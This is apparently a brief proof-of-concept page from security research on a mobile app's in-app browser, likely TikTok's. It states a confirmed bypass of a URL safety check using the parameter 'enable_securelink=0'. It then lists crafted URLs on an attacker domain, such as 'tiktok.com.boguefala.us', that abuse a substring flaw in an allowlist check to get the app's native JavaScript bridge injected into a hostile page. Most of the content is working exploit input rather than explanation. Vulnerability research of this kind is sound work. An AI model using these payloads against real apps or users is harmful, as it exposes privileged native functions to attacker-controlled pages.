SCC bypass → bridge chain — lrd0036
CONFIRMED: enable_securelink=0 loads arbitrary URLs past the safety gate.
Now chaining the p_checkURLInAllowDomain substring flaw (host contains an allowlisted
token) to get the native bridge injected. WIN = red page renders AND its
webkit.messageHandlers box is non-empty.
1 · confirmed SCC bypass (baseline — should load, bridge likely empty)
boguefala.us/poc &enable_securelink=0
2 · FULL CHAIN — SCC off + host-substring for bridge injection
tiktok.com.boguefala.us/poc &enable_securelink=0
…tiktok.com.boguefala.us + param both places
3 · other allowlist tokens (if tiktok.com isn't the allowlisted one)
tiktokv.com.boguefala.us/poc &enable_securelink=0
webcast.tiktok.com.boguefala.us/poc &enable_securelink=0
4 · Safari controls
tiktok.com.boguefala.us/poc in Safari